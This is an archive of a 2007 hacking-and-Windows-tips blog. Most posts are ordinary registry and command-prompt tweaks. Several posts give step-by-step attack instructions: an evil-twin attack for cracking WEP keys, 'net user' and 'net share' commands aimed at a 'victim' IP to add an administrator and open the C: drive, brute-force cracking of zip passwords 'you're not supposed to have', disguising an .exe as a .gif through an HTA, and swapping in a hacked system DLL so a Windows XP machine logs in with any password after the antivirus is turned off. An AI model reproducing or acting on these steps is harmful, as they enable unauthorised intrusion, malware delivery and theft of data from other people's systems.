Sunday, December 30, 2007

Wireless WEP Key Cracker Tool !!

Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients.

It uses combination of fragmentation and evil twin attacks to generate
traffic which can be used for KoreK-style WEP-key recovery.

This tool can be used to mount fake access point attack against WEP-based wireless clients.

This code tested patched mm,

madwifi-old drivers with athraw support, but also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for fake AP) and second in monitor mode (to listen on).

How to Use:
1. Setup fake AP with KARMA tools or iwconfig
iwpriv ath0 mode 2
iwconfig ath0 mode master essid foo enc 1122334455 channel 7
echo 1 > /proc/sys/dev/ath0/rawdev
echo 1 > /proc/sys/dev/ath0/rawdev_type
ifconfig ath0
up ifconfig ath0raw up2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)

3. Wait until client connect to fake access point
4. Launch airodump-ng to collect packets
5. Launch aircrack-ng to recover WEP key

Download

Love happen's once and the rest is just life!!!!

How to Search For Rapidshare Folders by Using Goolge !!

Just go to Google.com and paste this string there ..

site:rapidshare.com inurl:users "Anything you want to search for"

site:rapidshare.de inurl:users "cracking"

site:rapishare.com inurl:files "web hacking"

site:rapidshare.de inurl:files "tips and tricks"

Love happen's once and the rest is just life!!!!

Thursday, December 27, 2007

Bios Entry Keys combos !!

Acer - CTL ALT ESC

AMI BIOS - DEL, F1 or F2

AST, Advantage, Award, Tandon - CTL ALT ESC

Award BIOS - DEL or CTL ALT ESC

Compaq - F10

DELL - F1 or DEL or CTL ALT ENTER

DTK BIOS - Esc

Gateway 2000 - F1

Hewlett Packard - F1

IBM
Older Models - In order to get into the configuration of the IBM setup screen CMOS screen you need to hold down both mouse buttons during bootup.
Aptiva - F1
PS/2 - CTL ALT INS after CTL ALT DEL
PS/2 with reference partition - INS

NEC - F2

Olivetti PC Pro - SHIFT CTL ALT Numpad DEL

Packard Bell - F1 or F2

Phoenix BIOS F1 or F2, or CTL ALT ESC or CTL ALT S or CTL S or CTL ALT INS

Sharp Laptop 9020 - F2

Sony - F3 at switchon, then F2 or F1

Tandon - CTL SHIFT ESC

Toshiba - ESC at switchon

Zenith - CTL ALT INS

Miscellaneous - CTL ESC or CTL ALT +


Love happen's once and the rest is just life!!!!

Hide Windows Vista Hard drives !!

Back up your registry before you start!

1. Open Regedit.

2. Navigate to one of these strings:

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer - this only changes the settings for the current logged in user

HKEY_LOCALMACHINE\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer - this changes the settings for all users on the machine. You may have to create the key folder "Explorer" manually.

3. In the Explorer key folder, create a new DWORD value by right-clicking Explorer, then choosing New DWORD value. Name the value "NoDrives" (without the quotes). This value defines local and network drive visibility for each logical drive on the computer. All drives will be visible as long as this value's data is set to 0.

4. Following the table below, enter the decimal number corresponding to the drive(s) you want to hide as NoDrives value data. When you right-click on NoDrives and choose Modify, make sure you select Decimal base, not Hexadecimal.

Drive Number to hide
A: 1
B: 2
C: 4
D: 8
E: 16
F: 32
G: 64
H: 128
I: 256
J: 512
K: 1024
L: 2048
M: 4096
N: 8192
O: 16384
P: 32768
Q: 65536
R: 131072
S: 262144
T: 524288
U: 1048576
V: 2097152
W: 4194304
X: 8388608
Y: 16777216
Z: 33554432
All drives 67108863

If you want to hide more than one drive, you simply add the drive amounts together for a combined total.

For example, to hide the D:/ and T:/ drives, add the decimal value for the D:/ drive to the decimal value to the T:/ drive.

8 (D) + 524288 (T) = 524296

To disable all of your visible drives, set the value to 67108863.

You must reboot your PC to see your changes.


Love happen's once and the rest is just life!!!!

Problems of Changing the Boot Screen !!

If you download a hacked system file with a new boot screen and replace the old file on your computer, after you restart, you may find that your computer will not start and will give you a nice error message.
C:\Windows\System32\ntoskrnl.exe is missing or corrupt
Missing or corrupt?
This is the most common problem that users experience when trying to change their boot screen using the file swap technique.
Users that get this message, or any similar error message, are receiving it because they replaced their system file with a file that is not compatible with their version of Windows XP.
Windows XP was released in many different languages for different parts of the world. Each language version of XP has a slightly different version of code. Additionally, Microsoft continuously releases software update patches to update the code of the system files such as the monthly security updates and almost yearly service packs. All of these factors result in several different versions of the boot screen system file floating around on the Web.
You could find a boot screen file that was made from a hacked system file from the German version of Windows XP. Or more commonly, you could find a boot screen that was made from a hacked file from the original version of Windows XP.When you try to install that boot screen on a computer that, for example, has Service Pack 2 installed on the English version of XP, you will have problems.
Windows XP will only work with a specific version of the system file that contains the boot screen.
This arrangement complicates the change of the boot screen with the common file swap technique. It will do so because users will have difficulty telling on what version of Windows XP a particular boot screen that is distributed on the Web will work. Users have to be aware of more than just the version problem. Because you are downloading a hacked version of a critical system file that is executed during the boot sequence, you could possibly download a version that someone modified and in which she /he put some variation of malicious code that could harm your computer

Love happen's once and the rest is just life!!!!

Removing a User From Welcome Screen !!

1. Click the Start button and select Run, then type regedit in the box and click OK.

2. This will start up the system Registry Editor. You are going to want to expand the following
keys: HKEY_LOCAL_MACHINE, SOFTWARE, Microsoft,Windows NT,
CurrentVersion,Winlogon, SpecialAccounts, and UserList.


3. You should now see the list of the account names, and parts of account names, that the system
will look for and will hide.To add a name to the list, just right-click and select New
1 DWORD value. A DWORD is a specific data type of an entry
in the system registry. In short, the DWORD data type allows an integer value to be stored.

4. When the new key is created, enter in the name of the user’s account as the name of the
key. Once you have done this, you can close regedit.
After log off and back on or reboot, the user will not be displayed on the Welcome screen.
If you ever want to log into the account that you hide from the Welcome screen, just press
Ctrl_Alt_Delete on your keyboard once, twice, and you will be able to type in the name of
the user under which you want to log in. This way, you can hide an account from your family or
friends but can still log into it.
If you ever change your mind and want the account to be displayed on the Welcome screen
again, just delete the entry that you made in the list in the System Registry and everything will
be back the way it was.

Love happen's once and the rest is just life!!!!

Adding Web site links to the Start Menu !!

1. Click the Start Menu and select Run.
Then type regedit to launch the Registry Editor.

2. When the Registry Editor has launched, you will want to expand the HKEY_CLASSES_ROOT folder and then the CLSID folder.

3. Next, you will want to scroll through the list of Class IDs until you find {2559a1f6-21d7-11d4-bdaf-00c04f60b9f0} and expand it as well. Start your modifications by naming this class. Right-click the (default) entry within the{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0} folder and select modify.

5. Then type marshalinfo-in.blogspot.com {or any other website you like} in the value data box and click OK to save your changes.

6. Now you are going to set up the icon that will be displayed on the Start panel next to the name. To do this, you will need to create a new folder. Select the {2559a1f6-21d7-11d4-bdaf-00c04f60b9f0} folder again and right-click it. Then select New and then Key. This will create a new subfolder that you should call DefaultIcon.

7. Right-click the Default Icon folder that you just created and create a new string value by expanding new and selecting string value. Name this new value (Default). The value of this string will be the location of the icon that you want to use.

8. If you like using the system icons which are stored in the shell32.dll.To use these icons,right-click the new (Default) string value that you created and select modify. Then type %SystemRoot%\\system32\\shell32.dll,-47 in the value box and click OK to save.

The 47 in that line is the index of the icon that I wanted to use for my link to marshalinfo-in.blogspot.com.If you want to use a different icon, replace the 47 with the icon index number you want. You are free to use any icon that you want, including icons that are not in the shell32.dll file. If you want to use an icon that you downloaded or made, just enter the full path to that icon in place of the line mentioned above.

9. Now that the shortcut is set up, specify what it is supposed to do.To do this, expand the Instance folder that is inside the {2559a1f6-21d7-11d4-bdaf-00c04f60b9f0} folder and then expand the InitPropertyBag folder.

10. Inside the InitPropertyBag folder, you will be making the last changes for this hack.To start off, you will want to create a new string value and call it Command. You can create this by right-clicking the InitPropertyBag folder and selecting New, and then String Value.

11. Right-click the new string value that you created and select modify. Key in
marshalinfo-in.blogspot.com {or any other} in the value data box and click OK. This value will be the text that is displayed on the Start Panel.

12. Now you are almost finished. Create one more string value in the InitPropertyBag folder and name it Param1. Then right-click the string value, select Modify, type www.marshalinfo-in.blogspot.com{or any}, and click OK to save.
You are now finished! Once you log off and log back on, the changes will be activated.

Love happen's once and the rest is just life!!!!

Add Photos to My Computer Properites !!

1. Open Notepad.

2. Type the following:

[General]

Manufacturer="Marshal.R"

Model=Marshal Microsystems

[Support Information]

Line1= Your Ph No

Line2= Your Address

.....

3. Save as "oeminfo.ini" in the System32 folder.(Without Quote)

4. Create a bmp file(Your Photo) and save it the System32 folder as "oemlogo.bmp"(Without Quote).

5. Now Check your My Computer Properties.
Love happen's once and the rest is just life!!!!

Convert Fat To NTFS by Command !!

Click Start,
click Run, type cmd and then click OK.
At the command prompt,
type CONVERT [driveletter{c,d,e,f anydrive letter which you have}]: /FS:NTFS.
Convert.exe will attempt to convert the partition to NTFS.
NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).

Love happen's once and the rest is just life!!!!

Now Install Win XP Automatically !!

You can create a CD that can install Windows XP automatically, putting in all the details and answering all the dialog boxes.

The secret behind this is the answer file, which tells Windows what to do while it's installing. The answer file can be created using Windows setup manager.

Using this tool, you can make the answer file so powerful that you can even tell Windows to include or exclude individual components, set the display resolution, and more.

Here's the Steps involved in creating XP Automated Installation Disc :

Step 1:
To begin with, insert your Windows XP installation CD into the drive and copy the entire contents of the CD to a new folder on your hard disk.

Step 2:
Navigate to the Support > Tools folder on the CD and double-click the Deploy.cab file. Copy all the files to a new folder on your hard disk.

Step 3:
The crucial part begins now, creating the answer file. To execute the windows setup manager, double click the Setupmgr.exe file from the contents of the Deploy.cab, which you just copied onto the hard drive.

Step 4:
The first few steps of the wizard are self explanatory. Select the following options from the successive dialog boxes. Create a new answer file; Windows unattended installation (Select the appropriate Windows version); "Fully automated"; "No this answer file will be used to install from CD"; and finally, accept the license agreement.

Step 5:
Under the General Settings, you can customize the installation of Windows by providing the default name and organization, display settings, time zone and the product key. Fill in the fields using the drop-down list or by keying in the details. If you don't select an option from the drop-down list, the default values will be used.

Step 6:
After you are done click Finish and save the answer file as "winnt.sif" when you are prompted. Advanced users can further tweak the answer file by referring to the Help file called Ref.chm in the same folder.

Step 7:
Finally copy the answer file to i386 folder in the Windows XP installation folder you created in the beginning.

Step 8:
To burn a bootable installation disc, you need the boot sector of the Windows XP CD. Download it from here bootfiles.zip

Step 9:
Launch Nero and select CD-ROM (Boot) from the New Compilation dialog box. Under the Boot tab, specify the boot sector file you downloaded and extracted. Set the emulation as "No emulation", and keep the boot message blank. Most importantly, remember to set the "Number of loaded sectors" as 4.

Step 10:
Under the Burn tab, set the write method to disc at-once. Click the New button to to begin adding files and folders to the compilation. Drag all the contents of the Windows XP installation disc that you copied to your hard drive (with the answer file in the i386 folder) into the left pane. Insert a blank CD into the optical drive and hit burn button. Your windows automated installation Disc is ready..


Love happen's once and the rest is just life!!!!

Recover your Mobile Phone Sim Card SMS !!

SIM CARD DATA RECOVER SOFTWARES
im Card Data Recovery Software recovers your mobile phone sim card accidentally deleted text SMS messages। Data Doctor Sim Card Recovery Software is read only and non-destructive utility restore all lost message। Utility retrieve all deleted contact numbers (phone numbers), unreadable messages, corrupt phone book directory. With this tool you can undelete both viewed and unread inbox text SMSes, outbox messages and draft save favorite text messages sent items that have been deleted from sim card memory।It provides full backup of your cell phone’s erased sim memory. For recovery, you need a phoenix type USB sim card reader or PC/SC Standards based sim card Reader and a PC having Microsoft windows operating system. Sim card reader scans simcard deeply and detects all the recoverable information. Print option provides the facility to print report of all recovered data like your text message possible if sim card is locked (due to unauthorized PIN code). Software ensures and contact numbers. This software provides full details about sim card like its provider and ICC –ID (identification number). It provides restoration of lost or corrupted text files due to virus infection in your mobile phone. Recovery is not recovery even if your inbox, outbox, draft and sent items messages and phone numbers are invisible or unreadable. It fetches recently erased call list.
Download the software DOWNLOAD

Love happen's once and the rest is just life!!!!

Recover your Sim Card Memory !!

Monday, December 24, 2007

Backup Internet Explorer favorites !!

1◘ Select File -> Import and Export. This will start the "Import and Export" wizard.
2◘ Select Export and the click on "next."
3◘ Select Favorites and click on "next."
4◘ In the next window you can accept the default Save Directory or choose a new one. I suggest you select "Desktop" so you can easily find the file again. Click on "next."
5◘ Finally, click on "finish" and your Favorites will be saved to disk.

The default file name is "bookmark.htm": simply copy this file to a floppy disk or even email it to yourself (or both).

And To Import your Favorites into a newly created version of Microsoft Internet Explorer , just simply do the same but this time Import The Favourites..
n u r done ..

Love happen's once and the rest is just life!!!!

Sunday, December 23, 2007

Making a file of the size u want !!

Let us assume you want to make a file of size 10000kb
Convert it to bytes -> 10000*1024 which comes out to be 10240000 bytes

Open calculator (win key+r -> type in calc )
Choose view mode to be Scientific one
Type in 10240000 and convert it to hex it comes out to be 9C4000
Convert this value to 8 digits by padding zeroes to its left -> so finally it comes out be 009C4000

Open Command Prompt (win key + r -> type in cmd )
Type DEBUG filename.dat
it'll show file not found error ,ignore it
Type RCX -> Enter -> then last four hexadecimal numbers i.e. 4000 ->Enter
Type RBX -> Enter -> then first four hexadecimal numbers i.e. 009C->Enter
Type W ->Enter
Type Q ->Enter

W stands for write and Q for quit

Now check the file you just made by dir command ->dir filename.dat

Using the same technique you can make files as big as you want...

Another simpler method

Try this command on cmd
fsutil file createnew [path]{e.g.:-F:new foldervirus.txt} [SizeInBytes]then press enter

Love happen's once and the rest is just life!!!!

Cracking Zip Password Files !!

I will do by using FZC ..
What is FZC?
FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.


FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.).


FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.

The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.

FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.

Now that you have a good wordlist, just get FZC working on the locked zip file


We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.

If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

Now that we've gone through all the theoretical stuff, let's get to the actual commands.


--------------------------------------------------------------------------------
Bruteforce
--------------------------------------------------------------------------------


The command line you'll need to use for using brute force is:

fzc -mb -nzFile.zip -lChr Lenght -cType of chars

Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)

For Chr Lenght you can use 4 kind of switches...

-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...

For the Type of chars we have 5 switches they are:

-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers


Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:

fzc -mb -nzTest.zip -l4-7 -ca1

This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

*****
hint
*****

You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.


--------------------------------------------------------------------------------
Wordlis
--------------------------------------------------------------------------------

Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you'll do something like.

fzc -mwMode number -nzFile.zip -nwWordlist

Where:

Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.

You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC would just start reading at line 50 and would just read with length >= to 9.

Example:

If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50





--------------------------------------------------------------------------------
Resuming
--------------------------------------------------------------------------------

Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:

fzc -mr

And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.


Love happen's once and the rest is just life!!!!

make .exe file into .gig file !!

Simply goto a run prompt and type:

cscript.exe hide.vbs your.gif your.exe

The script merges "your.gif" and "your.exe" to create "your.gif.hta.gif", which correctly displays using the IE browser. If the 'Hide extension for known file types' option is enabled, which is the default setting, the "Save Picture As..." will download "your.gif", it's really "your.gif.hta". (Example: Right-click and Save Homer)

Microsoft described an HTA as running much like an .exe file.

Love happen's once and the rest is just life!!!!

Enabling Task Manager if it is Disable !!

Method no. 1

1. Go to Start -> Run -> Write regedit and press on Enter button.

2. Navigate to the following registry keys and verity that following settings set to default:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\]
“DisableTaskMgr”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“DisableCAD”=dword:00000000
3. Reboot the computer.

Method .2

1. Go to Start - Run -> Write Gpedit.msc and press on Enter button.

2. Navigate to User Configuration - Administrative Templates -> System - Ctrl+Alt+Del Option

3. In the right side of the screen verity that Remove Task Manager option set to Disable or Not Configured.

4. Close Gpedit.msc

5. Go to Start - Run -> Write gpupdate /force and press on Enter button.

Love happen's once and the rest is just life!!!!

Wednesday, December 12, 2007

Turn off system beeps !!

Start Regedit.

Navigate to HKEY_CURRENT_USER\Control Panel\Sound Once there, locate Beep on the list on the right.
Right click on it and select Modify
Change the value equal to no
Reboot your computer and the beeps will be gone!

Love happen's once and the rest is just life!!!!

Reinstall IE6 !!

1) Insert the Win XP CD

2) Open Start / Run and type:
rundll32.exe setup api,Install Hinf Section Default Install 132
c:\windows\inf\ie.inf

Press ENTER

And you are done !!

Love happen's once and the rest is just life!!!!

Tips For Command Prompt !!

Turn on Quick Edit Mode. This will allow you to easily select, copy and paste all with just your mouse and a right click.

When typing in a file or folder name, type in part of the name and then hit the TAB key to bring up matches. Use SHIFT +TAB to go the other direction.

When searching for a file, type in dir part_of_filename* to look for the file in the folder. To search sub directories as well, append the /s flag as well. Example: dir exp* /s

Use the up arrow to go back over past commands. Alternatively you can hit F7 and go directly to the command.

When working with network drives type: prompt $m$p$g to show the full network path along with the drive prompt. Other prompt settings can be found by running prompt /?.

You can print the contents of a file by typing: copy file.txt prn
Write the output of any command by appending > output.txt. For example, dir > filelist.txt

Love happen's once and the rest is just life!!!!

Customize The Command Prompt !!

1◘ Click on the Start Button and key in Command Prompt and hit Enter.

2◘ Once Command Prompt has started, right click on the top left icon in the menu bar and select Defaults. Alternatively you can select Properties if you want to have different settings for different Command Prompt shortcuts.

3◘ You will now see the four tabs of options to customize. The sections that I always work with are Font, Layout and Colors. To get started, click on the Font tab. Here you will be able to change the font and size used. If you would like a micro prompt as shown below, select Raster Fonts and size 4x6.

4◘ On the Layout tab you can specify the size and location of the window as well as the buffer. I usually only change the Screen Buffer Height setting. This controls how many previous command lines are saved and can be scrolled back up through.

5◘ Increasing this value is useful if you are looking at a large directory with more than 300 files. I always increase the Height value to the max which is 9999.

6◘ The Color tab is where you get to have the most fun changing the look of your Command Prompt. Just select what you want to change the color for and then change the color.

7◘ Back on the Options tab I recommend turning on Quick Edit Mode. This allows you to easily highlight text without having to go to Edit -> Mark and copy it by just right clicking. Then you can paste it by simply right clicking once more.

8◘ When you are finished customizing your Command Prompt, just hit OK to save your changes.


Love happen's once and the rest is just life!!!!

Change The Title Text of your Yahoo Messenger !!

Here’s how you change the title text that appears at the top of the Messenger window. By default, this is “Yahoo! Messenger”, followed by your status. Simply edit the ymsgr.ini file, which you will find in the same folder as the Messenger program, in your Program Files folder. Locate the file and open it in Notepad. Then, at the end, add the following:

[APP TITLE]
caption=YOUR TEXT

Here, “YOUR TEXT” is whatever you want in the title bar. Save the file and close Messenger. When you restart it you will see your text in the title bar.


Love happen's once and the rest is just life!!!!

Create a drive menu for My Computer !!

Set My Computer to work like a menu for easier access to the drives you need.
By default, the My Computer item on the Start menu is configured to work like a standard folder window. If you need to access a specific drive, select My Computer from the Start menu, wait a moment for the window to appear, and then double-click the icon for the drive you need to access.

When you're in a hurry, this two-step procedure can be time-consuming and frustrating—especially if My Computer contains a large number of drive icons. However, Windows XP makes it easy for you to configure My Computer so it works like a menu, with each drive listed as a menu item.
Here's how.

1. Right-click the Start button, and select Properties.

2. Click Customize, which is adjacent to the Start Menu radio button, and select Advanced.

3. Scroll through the Start Menu Items list box until you see My Computer.

4. Select Display As A Menu, and click OK twice.
Now, when you select My Computer from the Start menu, you'll see a menu of individual drives. To access the contents of that drive, just select the drive letter from the menu.


Love happen's once and the rest is just life!!!!

Monday, December 3, 2007

Acces the internet via your Calculator !!

1. Open your MS Calculator. This is normally found in Start => All Programs => Accessories => Calculator.

2. Open the help-window by pressing the F1 key.

3. Click the top-left corner icon of the help window once (Standard is a Document with a Questionmark).

4. Select Go to URL-address.

5. Type your address into the avaliable field, but remember to type http://, and not just www. (or equivalent).

Love happen's once and the rest is just life!!!!

Tips how to start Hacking !!

1) ping command
a cool way to say hello to victim
try
ping [victims ip goes here]
if the result is request timed out then the user is ofline
if the result is reply from [ip] bytes=32 time<1ms TTL 64
the victim is online.

2)net user [anyname] /add
it adds a new net user put any name inplace of [anyname]

3)net localgroup administrators [anyname] /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.

4)net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
you can use any root dir. instead

5)net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
where nameofnetuser is the name via which victim logs on

6)explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access! first

Love happen's once and the rest is just life!!!!

Basic Needs for Hacking !!

1. Learn about hardware - basicly how your computer works.

2. Learn about different types of software.

3. Learn DOS.(learn everything possible)

4. Learn how to make a few batch files.

5. Port scanning. ( download blues port scanner if it's your first time)

6. Learn a few programming languages
HTML,C++,Python,Perl.... (i'd recommend learning html as your first lang)

7. How to secure yourself (proxy,hiding ip etc)

8. FTP

9. TCP/Ip , UDP , DHCP ,

10. Get your hands dirty with networking

11. Learn diassembler language (its the most basic language for understanding machine language and very useful to ubderstand when anything is disassembled and decoded)

12. Learn to use a Unix os. (a Unix system is generally loaded with networking tools as well as a few hacking tools)

13. Learn how to use Exploits and compile them. (Perl and c++ is must)

Love happen's once and the rest is just life!!!!

Recover files or folders In Vista !!

1. Click on the drive that you want to scan for deleted files
2. Click on Scan Files button and wait...
3. You can wipe the file completely to prevent from recovery by using the Wipe button OR you can recover the deleted file by clicking the Recovery button

Features of DataRecovery:
* FAT12, FAT16, FAT32, NTFS undeletion
* undelete NTFS compressed files
* undelete EFS encrypted files
* wipe out deleted files never to be recovered again
* Able to run from floppy disk
* search by partial string in the file name
* undelete whole files in a directory
* undelete multiple files by selecting them with Shift/Ctrl key
* sort items displayed by clicking column headers
* neither installation nor DLLs is needed
* Windows Vista supported (The wipe function won't work on Windows Vista due to Windows Vista built-in file protection)

Important Note: Always install the data recovery program on another hard drive or USB flash drive and also when you've selected the file to recover, make sure you DON'T save it on the same drive because there is a chance that it'll overwrite it before you can completely recover the file.

Download data Recovery

Love happen's once and the rest is just life!!!!

Hack into Win Xp Computer without Breaking Password !!

There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.


1. Get physical access to the machine. Remember that it must have a CD or DVD drive.

2. Download DreamPackPL HERE

3. Unzip the downloaded dreampackpl.zip and you'll get dreampackpl.ISO.

4. Use any burning program that can burn ISO images.

5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.

6. Press "R" to install DreamPackPL.

7. Press "C" to install DreamPackPL by using the recovery console.

8. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)

9. Backup your original sfcfiles.dll by typing:
"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)

10. Copy the hacked file from CD to system32 folder. Type:
"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)

11. Type "exit", take out disk and reboot.

12. In the password field, type "dreamon" (without quotes) and DreamPack menu will
appear.

13. Click the top graphic on the DreamPack menu and you will get a menu popup.


14. Go to commands and enable the options and enable the god command.



You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.

If you are unable to bring up the DreamPackPL then Disable your Anti Virus ..


Love happen's once and the rest is just life!!!!

Turn Aero Feature off !!

1• Right click on your desktop and click Personalize
2• Click on Windows Color and Appearance
3• Choose Open classic appearance properties for more color options (at the bottom)
4• From the Color Scheme choose Windows Vista Basic or whatever theme suits you.


Love happen's once and the rest is just life!!!!

View and delete temporary internet files !!

Temporary internet file are files used by your browser (Internet Explorer, Firefox etc) to store copies of visited websites on your hard drive. By erasing these files, you remove unwanted data, which can lead to an increase in your computer overall performance.

Open IE (Internet explorer)
Click on Tools
Internet Options
Select Settings in the Browsing History section and click on View files

To delete these files
Click on Tools
Internet Options - select Delete in the Browsing History section ,besides Internet Temporary Files click on the Delete files... and confirm ..

This was the First trick to Delete the Temporary files ..

Method 2

Click on the Start
Type Disk in the search bar and select Disk Cleanup or simply
Click on Start >
All Programs >
Accesories >
System Tools >
Disk Clean up >

Select the appropriate drive and click OK
Select Temporary internet files and click View files ..

To delete these files, make sure the to check the checkbox besides Temporary internet files, select OK and click on Delete files ..

Select the appropriate drive and click OK
Select Temporary internet files and click View files
Love happen's once and the rest is just life!!!!

Shell Commands !!

A full list of Windows Vista Shell Commands ..

AddNewProgramsFolder
Administrative Tools
AppData
AppUpdatesFolder
Cache
CD Burning
ChangeRemoveProgramsFolder
Common Administrative Tools
Common AppData
Common Desktop
Common Documents
Common Programs
Common Start Menu
Common Startup
Common Templates
CommonDownloads
CommonMusic
CommonPictures
CommonVideo
ConflictFolder
ConnectionsFolder
Contacts
ControlPanelFolder
Cookies
CredentialManager
CryptoKeys
CSCFolder
Default Gadgets
Desktop
Downloads
DpapiKeys
Favorites
Fonts
Gadgets
Games
GameTasks
History
InternetFolder
Links
Local AppData
LocalAppDataLow
LocalizedResourcesDir
MAPIFolder
My Music
My Pictures
My Video
MyComputerFolder
NetHood
NetworkPlacesFolder
OEM Links
Original Images
Personal
PhotoAlbums
Playlists
PrintersFolder
PrintHood
Profile
ProgramFiles
ProgramFilesCommon
ProgramFilesCommonX86
ProgramFilesX86
Programs
Public
PublicGameTasks
Quick Launch
Recent
RecycleBinFolder
ResourceDir
SampleMusic
SamplePictures
SamplePlaylists
SampleVideos
SavedGames
Searches
SendTo
